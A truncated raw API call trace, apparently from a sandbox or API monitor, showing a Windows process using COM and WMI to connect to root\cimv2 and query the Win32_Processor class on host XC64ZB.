[0157.110] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3c4*=0x3a4, lpdwindex=0x19f1e4 | out: lpdwindex=0x19f1e4) returned 0x0 [0157.126] CoGetContextToken (in: pToken=0x19f290 | out: pToken=0x19f290) returned 0x0 [0157.126] CoGetContextToken (in: pToken=0x19f1f0 | out: pToken=0x19f1f0) returned 0x0 [0157.126] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x19f2c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f2bc | out: ppvObject=0x19f2bc*=0x594660) returned 0x0 [0157.126] WbemDefPath:IUnknown:AddRef (This=0x594660) returned 0x3 [0157.126] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x2 [0157.129] WbemDefPath:IWbemPath:SetText (This=0x594660, uMode=0x4, pszPath="win32_processor") returned 0x0 [0157.132] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594660, puCount=0x19f444 | out: puCount=0x19f444*=0x0) returned 0x0 [0157.132] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f440*=0x0, pszText=0x0 | out: puBuffLength=0x19f440*=0x10, pszText=0x0) returned 0x0 [0157.132] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f440*=0x10, pszText="000000000000000" | out: puBuffLength=0x19f440*=0x10, pszText="win32_processor") returned 0x0 [0157.133] WbemDefPath:IWbemPath:GetInfo (in: This=0x594660, uRequestedInfo=0x0, puResponse=0x19f44c | out: puResponse=0x19f44c*=0xc15) returned 0x0 [0157.133] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594660, puCount=0x19f444 | out: puCount=0x19f444*=0x0) returned 0x0 [0157.133] WbemDefPath:IWbemPath:GetInfo (in: This=0x594660, uRequestedInfo=0x0, puResponse=0x19f44c | out: puResponse=0x19f44c*=0xc15) returned 0x0 [0157.133] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594660, puCount=0x19f434 | out: puCount=0x19f434*=0x0) returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f430*=0x0, pszText=0x0 | out: puBuffLength=0x19f430*=0x10, pszText=0x0) returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f430*=0x10, pszText="000000000000000" | out: puBuffLength=0x19f430*=0x10, pszText="win32_processor") returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594660, puCount=0x19f434 | out: puCount=0x19f434*=0x0) returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f430*=0x0, pszText=0x0 | out: puBuffLength=0x19f430*=0x10, pszText=0x0) returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f430*=0x10, pszText="000000000000000" | out: puBuffLength=0x19f430*=0x10, pszText="win32_processor") returned 0x0 [0157.134] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594660, puCount=0x19f3c4 | out: puCount=0x19f3c4*=0x0) returned 0x0 [0157.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3dc [0157.136] SetEvent (hEvent=0x3b4) returned 1 [0157.136] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19ec1c*=0x3dc, lpdwindex=0x19ea3c | out: lpdwindex=0x19ea3c) returned 0x0 [0157.140] CoGetContextToken (in: pToken=0x19eae8 | out: pToken=0x19eae8) returned 0x0 [0157.140] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0157.140] WbemDefPath:IUnknown:QueryInterface (in: This=0x594510, riid=0x19eb18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19eb14 | out: ppvObject=0x19eb14*=0x594510) returned 0x0 [0157.140] WbemDefPath:IUnknown:AddRef (This=0x594510) returned 0x3 [0157.140] WbemDefPath:IUnknown:Release (This=0x594510) returned 0x2 [0157.140] WbemDefPath:IWbemPath:SetText (This=0x594510, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0157.140] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f3b0 | out: puCount=0x19f3b0*=0x2) returned 0x0 [0157.140] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f3ac*=0xf, pszText=0x0) returned 0x0 [0157.140] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3ac*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3ac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.141] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e0 [0157.141] SetEvent (hEvent=0x3b4) returned 1 [0157.141] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f30c*=0x3e0, lpdwindex=0x19f12c | out: lpdwindex=0x19f12c) returned 0x0 [0157.144] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0157.144] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0157.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x594580, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x594580) returned 0x0 [0157.144] WbemDefPath:IUnknown:AddRef (This=0x594580) returned 0x3 [0157.144] WbemDefPath:IUnknown:Release (This=0x594580) returned 0x2 [0157.144] WbemDefPath:IWbemPath:SetText (This=0x594580, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0157.144] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x19f388 | out: puCount=0x19f388*=0x2) returned 0x0 [0157.144] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f384*=0x0, pszText=0x0 | out: puBuffLength=0x19f384*=0xf, pszText=0x0) returned 0x0 [0157.144] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f384*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f384*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.184] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f2a8*=0x3f4, lpdwindex=0x19f15c | out: lpdwindex=0x19f15c) returned 0x0 [0158.051] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0158.051] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0158.052] IUnknown:QueryInterface (in: This=0x524148, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f024 | out: ppvObject=0x19f024*=0x524158) returned 0x0 [0158.052] CObjectContext::ContextCallback () returned 0x0 [0158.062] IUnknown:Release (This=0x524158) returned 0x1 [0158.063] CoUnmarshalInterface (in: pStm=0x580780, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f094 | out: ppv=0x19f094*=0x546dc8) returned 0x0 [0158.064] CoMarshalInterface (pStm=0x580780, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546dc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0158.065] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef34 | out: ppvObject=0x19ef34*=0x546dc8) returned 0x0 [0158.065] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eef0 | out: ppvObject=0x19eef0*=0x0) returned 0x80004002 [0158.066] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x0) returned 0x80004002 [0158.066] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0158.067] WbemLocator:IUnknown:AddRef (This=0x546dc8) returned 0x3 [0158.067] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e844 | out: ppvObject=0x19e844*=0x0) returned 0x80004002 [0158.067] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e7f4 | out: ppvObject=0x19e7f4*=0x0) returned 0x80004002 [0158.067] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e800 | out: ppvObject=0x19e800*=0x546d24) returned 0x0 [0158.068] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x546d24, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e808 | out: pCid=0x19e808*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.068] WbemLocator:IUnknown:Release (This=0x546d24) returned 0x3 [0158.068] CoGetContextToken (in: pToken=0x19e860 | out: pToken=0x19e860) returned 0x0 [0158.068] CoGetContextToken (in: pToken=0x19ec68 | out: pToken=0x19ec68) returned 0x0 [0158.068] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecf4 | out: ppvObject=0x19ecf4*=0x546dac) returned 0x0 [0158.068] WbemLocator:IRpcOptions:Query (in: This=0x546dac, pPrx=0x546dc8, dwProperty=2, pdwValue=0x19ed00 | out: pdwValue=0x19ed00) returned 0x0 [0158.068] WbemLocator:IUnknown:Release (This=0x546dac) returned 0x3 [0158.068] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x2 [0158.069] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x1 [0158.069] CoGetContextToken (in: pToken=0x19efe0 | out: pToken=0x19efe0) returned 0x0 [0158.069] WbemLocator:IUnknown:AddRef (This=0x546dc8) returned 0x2 [0158.069] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f298 | out: ppvObject=0x19f298*=0x546da4) returned 0x0 [0158.069] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546da4, pProxy=0x546dc8, pAuthnSvc=0x19f2e8, pAuthzSvc=0x19f2e4, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0, pImpLevel=0x19f2d0, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8 | out: pAuthnSvc=0x19f2e8*=0xa, pAuthzSvc=0x19f2e4*=0x0, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0*=0x6, pImpLevel=0x19f2d0*=0x2, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8*=0x1) returned 0x0 [0158.069] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x2 [0158.069] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f28c | out: ppvObject=0x19f28c*=0x546dc8) returned 0x0 [0158.069] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f278 | out: ppvObject=0x19f278*=0x546da4) returned 0x0 [0158.069] WbemLocator:IClientSecurity:SetBlanket (This=0x546da4, pProxy=0x546dc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.070] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x3 [0158.070] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x2 [0158.070] CoTaskMemFree (pv=0x598d08) [0158.070] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x1 [0158.070] SysStringLen (param_1=0x0) returned 0x0 [0158.070] CoGetContextToken (in: pToken=0x19f258 | out: pToken=0x19f258) returned 0x0 [0158.070] CoGetContextToken (in: pToken=0x19f1b8 | out: pToken=0x19f1b8) returned 0x0 [0158.070] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x19f288*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x57d280) returned 0x0 [0158.071] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0158.071] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0158.071] CoGetContextToken (in: pToken=0x19f218 | out: pToken=0x19f218) returned 0x0 [0158.071] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0158.071] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f298 | out: ppvObject=0x19f298*=0x546da4) returned 0x0 [0158.072] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546da4, pProxy=0x57d280, pAuthnSvc=0x19f2e8, pAuthzSvc=0x19f2e4, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0, pImpLevel=0x19f2d0, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8 | out: pAuthnSvc=0x19f2e8*=0xa, pAuthzSvc=0x19f2e4*=0x0, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0*=0x6, pImpLevel=0x19f2d0*=0x2, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8*=0x1) returned 0x0 [0158.072] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x3 [0158.072] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f28c | out: ppvObject=0x19f28c*=0x546dc8) returned 0x0 [0158.072] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f278 | out: ppvObject=0x19f278*=0x546da4) returned 0x0 [0158.072] WbemLocator:IClientSecurity:SetBlanket (This=0x546da4, pProxy=0x57d280, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.073] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x4 [0158.073] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x3 [0158.073] CoTaskMemFree (pv=0x598858) [0158.073] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0158.073] SysStringLen (param_1=0x0) returned 0x0 [0158.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x19f3ac | out: puCount=0x19f3ac*=0x2) returned 0x0 [0158.073] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3a8*=0xf, pszText=0x0) returned 0x0 [0158.074] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.074] CoGetContextToken (in: pToken=0x19f018 | out: pToken=0x19f018) returned 0x0 [0158.074] CoUnmarshalInterface (in: pStm=0x580780, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f00c | out: ppv=0x19f00c*=0x546dc8) returned 0x0 [0158.075] CoMarshalInterface (pStm=0x580780, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546dc8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0158.075] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eeac | out: ppvObject=0x19eeac*=0x546dc8) returned 0x0 [0158.075] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x3 [0158.075] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x2 [0158.075] CoGetContextToken (in: pToken=0x19ef58 | out: pToken=0x19ef58) returned 0x0 [0158.075] WbemLocator:IUnknown:AddRef (This=0x546dc8) returned 0x3 [0158.075] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x546da4) returned 0x0 [0158.076] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546da4, pProxy=0x546dc8, pAuthnSvc=0x19f260, pAuthzSvc=0x19f25c, pServerPrincName=0x19f254, pAuthnLevel=0x19f258, pImpLevel=0x19f248, pAuthInfo=0x19f24c, pCapabilites=0x19f250 | out: pAuthnSvc=0x19f260*=0xa, pAuthzSvc=0x19f25c*=0x0, pServerPrincName=0x19f254, pAuthnLevel=0x19f258*=0x6, pImpLevel=0x19f248*=0x3, pAuthInfo=0x19f24c, pCapabilites=0x19f250*=0x20) returned 0x0 [0158.076] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x3 [0158.076] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x546dc8) returned 0x0 [0158.076] WbemLocator:IUnknown:QueryInterface (in: This=0x546dc8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f0 | out: ppvObject=0x19f1f0*=0x546da4) returned 0x0 [0158.076] WbemLocator:IClientSecurity:SetBlanket (This=0x546da4, pProxy=0x546dc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.076] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x4 [0158.076] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x3 [0158.076] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x2 [0158.076] SysStringLen (param_1=0x0) returned 0x0 [0158.077] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0158.077] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0158.077] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0158.077] CoGetContextToken (in: pToken=0x19f190 | out: pToken=0x19f190) returned 0x0 [0158.077] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0158.077] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x546da4) returned 0x0 [0158.077] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546da4, pProxy=0x57d280, pAuthnSvc=0x19f260, pAuthzSvc=0x19f25c, pServerPrincName=0x19f254, pAuthnLevel=0x19f258, pImpLevel=0x19f248, pAuthInfo=0x19f24c, pCapabilites=0x19f250 | out: pAuthnSvc=0x19f260*=0xa, pAuthzSvc=0x19f25c*=0x0, pServerPrincName=0x19f254, pAuthnLevel=0x19f258*=0x6, pImpLevel=0x19f248*=0x3, pAuthInfo=0x19f24c, pCapabilites=0x19f250*=0x20) returned 0x0 [0158.077] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x3 [0158.077] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x546dc8) returned 0x0 [0158.078] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f0 | out: ppvObject=0x19f1f0*=0x546da4) returned 0x0 [0158.078] WbemLocator:IClientSecurity:SetBlanket (This=0x546da4, pProxy=0x57d280, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.078] WbemLocator:IUnknown:Release (This=0x546da4) returned 0x4 [0158.078] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x3 [0158.078] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0158.078] SysStringLen (param_1=0x0) returned 0x0 [0158.078] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f3b0*=0x0, pszText=0x0 | out: puBuffLength=0x19f3b0*=0x10, pszText=0x0) returned 0x0 [0158.079] WbemDefPath:IWbemPath:GetText (in: This=0x594660, lFlags=2, puBuffLength=0x19f3b0*=0x10, pszText="000000000000000" | out: puBuffLength=0x19f3b0*=0x10, pszText="win32_processor") returned 0x0 [0158.091] IWbemServices:GetObject (in: This=0x57d280, strObjectPath="win32_processor", lFlags=0, pCtx=0x0, ppObject=0x19f364*=0x0, ppCallResult=0x0 | out: ppObject=0x19f364*=0x5a5978, ppCallResult=0x0) returned 0x0 [0158.164] IWbemClassObject:Get (in: This=0x5a5978, wszName="__PATH", lFlags=0, pVal=0x19f34c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3f4*=0, plFlavor=0x19f3f0*=0 | out: pVal=0x19f34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\cimv2:Win32_Processor", varVal2=0x0), pType=0x19f3f4*=8, plFlavor=0x19f3f0*=64) returned 0x0 [0158.176] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_Processor") returned 0x46 [0158.188] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_Processor") returned 0x46 [0158.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430 [0158.190] SetEvent (hEvent=0x3b4) returned 1 [0158.191] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f308*=0x430, lpdwindex=0x19f124 | out: lpdwindex=0x19f124) returned 0x0 [0158.197] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0158.197] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0158.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x594900, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x594900) returned 0x0 [0158.197] WbemDefPath:IUnknown:AddRef (This=0x594900) returned 0x3 [0158.197] WbemDefPath:IUnknown:Release (This=0x594900) returned 0x2 [0158.197] WbemDefPath:IWbemPath:SetText (This=0x594900, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\cimv2:Win32_Processor") returned 0x0 [0158.198] IWbemClassObject:Get (in: This=0x5a5978, wszName="__CLASS", lFlags=0, pVal=0x19f3bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f43c*=0, plFlavor=0x19f438*=0 | out: pVal=0x19f3bc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Processor", varVal2=0x0), pType=0x19f43c*=8, plFlavor=0x19f438*=64) returned 0x0 [0158.219] SysStringByteLen (bstr="Win32_Processor") returned 0x1e [0158.219] SysStringByteLen (bstr="Win32_Processor") returned 0x1e [0158.219] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0158.219] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0158.219] IWbemServices:CreateInstanceEnum (in: This=0x57d280, 